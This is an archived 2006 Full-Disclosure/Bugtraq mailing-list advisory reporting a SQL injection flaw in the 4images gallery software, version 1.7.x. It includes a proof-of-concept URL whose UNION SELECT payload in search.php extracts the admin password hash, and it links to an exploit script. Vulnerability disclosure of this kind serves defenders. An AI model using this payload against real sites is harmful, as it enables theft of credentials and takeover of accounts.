[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b47a94630610081420w382ea2e3xbfb2af2cee4240f2@mail.gmail.com>
Date: Sun, 8 Oct 2006 16:20:08 -0500
From: disfigure <disfigure@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: SQL injection - 4images
/****************************************/
http://www.w4cking.com
Product:
4images 1.7.x
http://www.4homepages.de
Vulnerability:
SQL injection
Notes:
- SQL injection can be used to obtain password hash
- for version 1.7.3, you must log in as a registered user
POC:
<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN
Original advisory with exploit script (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1037
/****************************************/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists